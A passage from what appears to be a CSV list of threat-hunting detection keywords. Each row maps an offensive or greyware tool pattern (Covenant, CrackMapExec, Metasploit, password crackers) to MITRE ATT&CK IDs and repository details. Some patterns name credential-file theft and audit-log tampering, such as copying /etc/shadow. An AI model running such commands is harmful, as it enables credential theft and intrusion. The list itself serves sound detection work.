vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*core/sprayers/lync.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*core/teamserver/stagers/*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*CoreSecurity/impacket/*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*Corrupted MAC on input*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*corscanner -i urls.txt -t 100*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Could not set file modification time.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Could not write NTLM Hashes to the specified JTR_Dump_Path *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Couldn't clone GPO {} (maybe it does not exist?*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*couldn't handle sandbox event*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Covenant.API*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.Models*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/wwwroot*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPI.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPIExtensions.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantBaseMenuItem.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantService.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUser.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLogin.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLoginResult.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserRegister.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*covid19_koadic.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*cow-branded-longhorn.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cowpatty -f *.txt -r *.cap -s *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Cowpatty*","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/joswr1ght/cowpatty","1","1","N/A","N/A","2","152","34","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z" +"*cowsay -f dragon 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*cp /etc/passwd*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cp /etc/shadow /tmp/.*","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cp /etc/shadow*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cp /var/log/audit/audit.log .tmp*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*cp -i /bin/sh */crond*","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*cp sliver-* /opt/tools/bin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cpp_test_payload.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*Cr3dOv3r*","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","10","1902","437","2019-03-28T14:53:38Z","2017-11-13T20:49:57Z" +"*cracf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crack_databases.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*crack_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Crack-allDBs.git*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" +"*Crack-allDBs-main*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" +"*crack-allDBs-v1.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" +"*crack-allDBs-v2.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" +"*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cracklord-master.*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*cracklord-queued*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*cracklord-resourced*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*crackmapexec*","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*CrackMapExec*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*crackmapexec.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*crackmapexec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*crackmapexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*crackmapexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*crackpkcs12*","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","2","118","26","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z" +"*crackTGS*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*Crassus.csproj*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*Crassus.exe*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*Crassus.sln*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*crate::modules::{rec2mastodon,rec2virustotal}*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*CravateRouge/autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*CravateRouge/bloodyAD*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege 